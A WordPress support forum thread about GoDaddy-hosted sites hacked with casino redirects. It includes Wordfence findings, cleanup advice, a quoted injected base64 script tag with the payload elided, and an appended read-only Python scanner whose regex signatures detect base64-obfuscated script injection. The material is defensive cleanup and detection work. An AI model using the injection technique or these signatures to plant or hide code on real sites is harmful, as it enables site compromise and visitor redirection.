• I am trying to figure out first what the vulnerability is. I just noticed it a few days ago. When going to https://www.latinodayton.org/coupon (a page which does not exist), it brings up a site for gambling. I also found a folder with over 8,000 html files in the uploads folder within a folder called https://www.latinodayton.org. The folder(s) have 0755 and the files 0644 permissions. I also have other sites that are on the same hosting and they are all injected with this code. I used Wordfence to detect the files, but I am not sure how to clean them. If I try to delete the lines of code it flags, sometimes the site won’t load. I have the below references, so further guidance is appreciated:

    Critical Problems:

    * File appears to be malicious or unsafe: wp-includes/1functions-core.php

    * File appears to be malicious or unsafe: wp-admin/includes/class-wp-site-icon-private.php

    * File appears to be malicious or unsafe: wp-admin/includes/class-theme-upgrader-private.php

    * File appears to be malicious or unsafe: 1wp-config.php

    High Severity Problems:

    * Unknown file in WordPress core: wp-includes/1functions-core.php

    * Unknown file in WordPress core: wp-includes/1vars.php

    * WordPress core file modified: wp-includes/vars.php

Viewing 2 replies - 1 through 2 (of 2 total)
  • Dealing with malicious code can be quite a pain. Please take the following steps to proceed and mitigate the issue at hand:

    1. Consider putting the site in maintenance mode. You can use the Lightstart WordPress plugin for this. You’ll also minimize the potential harm to your web visitors.
    2. Back up the site: You may want to make a copy just in case you break something accidentally.
    3. Isolate all affected sites. You cited you have several. Take some time to assess and analyze the behavior of each site.
    4. Scan the site. You may use a service like Sucuri or Wordfence for this (you indicated you already have). Delete what you can. Some hackers insert base64 code into files, therefore at some point you’ll need to check individual files for issues.
      You may want to consider a fresh install of WordPress separately, after which you’ll restore the site content and configurations to the new site.
    5. Change stuff: This includes WordPress salts, usernames and passwords (remove what you don’t need)

    Henceforth, you’ll need to follow a security-first approach when designing websites. This includes installing a security plugin like SolidWP and configuring it appropriately.

    Thread Starter mohio

    (@mohio)

    Thanks, Samedi – seems like I have Base64 code. Any guides available to clean them? If I do a fresh install, when doing a backup of the MUST have folders according to WordPress, will any of those have the bad files?

    <script src="data:text/javascript;base64,…"></script><meta name='robots' content='max-image-preview:large' />
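
An added example, not part of either post and not Wordfence's own logic: a read-only Python scan that lists files carrying the `data:text/javascript;base64,` script tag quoted above, decodes each payload for reading, and flags HTML or PHP under an uploads folder. The `eval(base64_decode(` signature, the extension list and the constructed sample tree are assumptions.

```python
import base64
import re
import tempfile
from pathlib import Path

# Signatures: the data: URI script tag quoted in the thread, and (assumed) PHP eval of base64.
DATA_URI = re.compile(rb"<script[^>]*?data:text/javascript;base64,([A-Za-z0-9+/=]+)", re.I)
PHP_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
TEXT_EXTS = {".php", ".html", ".htm", ".js"}

def decode_preview(b64: bytes, limit: int = 60) -> str:
    """Decode a payload for reading only; nothing is ever executed."""
    b64 = b64[: len(b64) - len(b64) % 4]  # tolerate a truncated final group
    try:
        return base64.b64decode(b64, validate=True)[:limit].decode("utf-8", "replace")
    except ValueError:
        return "<not valid base64>"

def scan_file(path: Path, rel: str) -> list:
    data = path.read_bytes()
    hits = [("data-uri-script", decode_preview(m.group(1))) for m in DATA_URI.finditer(data)]
    if PHP_B64.search(data):
        hits.append(("eval-base64-decode", ""))
    # Assumption: uploads/ should hold media, so PHP or HTML there deserves a look.
    if "uploads" in Path(rel).parts and path.suffix.lower() in {".php", ".html", ".htm"}:
        hits.append(("script-or-html-in-uploads", ""))
    return hits

def scan_tree(root: str) -> dict:
    report = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in TEXT_EXTS:
            rel = p.relative_to(root).as_posix()
            if hits := scan_file(p, rel):
                report[rel] = hits
    return report

def build_sample(root: Path) -> None:
    """Constructed sample tree: two suspicious files and one clean one."""
    payload = base64.b64encode(b"console.log('constructed sample');").decode()
    (root / "wp-content/uploads").mkdir(parents=True)
    (root / "index.html").write_text(f'<script src="data:text/javascript;base64,{payload}"></script>')
    (root / "wp-content/uploads/page1.html").write_text("<p>constructed</p>")
    (root / "clean.php").write_text("<?php echo 'ok';")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(Path(tmp))
        print(scan_tree(tmp))
```

Point `scan_tree` at a downloaded copy of the site rather than the live document root; it only reads files and reports, so removal decisions stay manual.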

  • The topic ‘Godaddy hosting with multiple wordpress sites hacked by Casino redirects and inj’ is closed to new replies.